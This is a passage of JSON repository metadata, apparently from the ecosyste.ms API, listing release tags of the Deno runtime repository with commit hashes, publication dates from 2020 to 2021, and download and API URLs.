7d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","s